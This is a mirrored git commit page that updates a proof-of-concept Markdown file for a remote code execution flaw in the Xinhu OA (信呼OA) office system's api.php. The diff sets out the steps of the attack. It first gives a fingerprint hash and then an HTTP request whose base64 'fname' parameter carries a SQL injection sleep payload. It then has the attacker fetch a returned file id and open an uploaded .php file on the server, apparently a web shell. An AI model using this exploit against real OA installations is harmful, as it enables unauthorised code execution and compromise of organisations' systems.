mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
Update 信呼OA办公系统后台api.php接口存在RCE.md
This commit is contained in:
parent
a3f58d2aa8
commit
12144bb68e
@ -8,7 +8,7 @@
|
||||
icon_hash="1652488516"
|
||||
```
|
||||
|
||||
## poc
|
||||
## 第一步
|
||||
|
||||
```javascript
|
||||
GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1
|
||||
@ -28,10 +28,19 @@ sec-ch-ua-mobile: ?0
|
||||
sec-ch-ua-platform: "Windows"
|
||||
```
|
||||
|
||||

|
||||

|
||||
|
||||
## 第二步
|
||||
|
||||
```javascript
|
||||
访问:http://xxxx/api.php?a=getmfilv&m=upload|api&d=task&fileid=返回的id值
|
||||
```
|
||||
|
||||
## 漏洞来源
|
||||

|
||||
|
||||
## 第三步
|
||||
```
|
||||
通过前面第二部获取的地址直接访问即可
|
||||
http://localhost/upload/2025-03/26_rocktpl5661_1363.php
|
||||
```
|
||||
|
||||
- https://forum.butian.net/article/613
|
||||
|
Loading…
x
Reference in New Issue
Block a user